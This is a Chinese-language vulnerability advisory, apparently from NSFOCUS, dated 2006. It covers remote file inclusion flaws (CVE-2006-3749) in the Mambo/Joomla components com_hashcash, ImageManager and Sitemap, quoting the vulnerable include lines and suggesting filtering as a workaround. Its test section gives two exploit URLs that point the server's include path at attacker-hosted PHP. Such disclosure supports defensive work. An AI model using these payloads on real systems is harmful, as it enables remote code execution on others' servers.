安全研究
安全漏洞
Mambo/Joomla多个组件远程文件包含漏洞
发布日期:2006-07-12
更新日期:2006-07-14
受影响系统:
Mambo com_hashcash 1.2.1描述:
Mambo ImageManager 1.5
Mambo Sitemap 2.0.0
BUGTRAQ ID: 18991
CVE(CAN) ID: CVE-2006-3749
Mambo(也被称为Joomla)是一款开放源代码的WEB内容管理系统。
Mambo的多个组件中存在远程文件包含漏洞,远程攻击者可能利用这些漏洞在服务器上以Web进程权限执行任意命令。
由于没有正确过滤$mosConfig_absolute_path变量,因此在register_globals=on和allow_fopenurl=on的配置情况下攻击者就可以使脚本包含远程服务器上的PHP代码执行。
漏洞相关的脚本及代码如下:
# Hashcash组件
在com_hashcash文件夹中server.php脚本存在漏洞:
-----------------------server.php---------------------------------------
<?php
include($."/administrator/components/com_hashcash/config.hashcash.php");
require_once ($mosConfig_absolute_path.'/components/com_hashcash/CryptoStrategy.php');
...................
------------------------------------------------------------------------
# HTMLArea3 addon - ImageManager
在ImageManager文件夹中config.inc.php脚本存在漏洞:
-----------------------config.inc.php-----------------------------------
<?php
// $Id: config.inc.php, v 1.5 2004/06/03 17:35:27 bpfeifer Exp $
/**
* HTMLArea3 addon - ImageManager
* Based on Wei Zhuo's ImageManager
* @package Mambo Open Source
* @Copyright 2004 Bernhard Pfeifer aka novocaine
* @ All rights reserved
* @ Released under GNU/GPL License : http://www.gnu.org/copyleft/gpl.html
* @version $Revision: 1.5 $
**/
require($mosConfig_absolute_path."/administrator/components/com_htmlarea3_xtd-c/config.htmlarea3_xtd-c.php");
------------------------------------------------------------------------
# Sitemap 2.0.0 for Mambo 4.5.1 CMS
在com_sitemap文件夹中sitemap.xml.php脚本存在漏洞:
-----------------------sitemap.xml.php----------------------
<?php
/**
* XML/XHTML menu system
* @package Mambo_4.5.1
* @copyright (C) 2000 - 2004 Miro International Pty Ltd
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL
* Mambo is Free Software
* Author : Johan Janssens - johan@jinx.be (http://www.jinx.be)
**/
// XML library
require_once( $mosConfig_absolute_path . '/includes/domit/xml_domit_lite_include.php' );
------------------------------------------------------------
<*来源:Ahmad Maulana (matdhule@gmail.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=115280523322971&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[target]/[path]/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=http://evilscript
http://[target]/[path]/components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://attacker.com/evil.txt?
建议:
临时解决方法:
* 过滤$mosConfig_absolute_path变量。
厂商补丁:
Mambo
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://sourceforge.net/projects/mambo
浏览次数:3096
严重程度:0(网友投票)
绿盟科技给您安全的保障
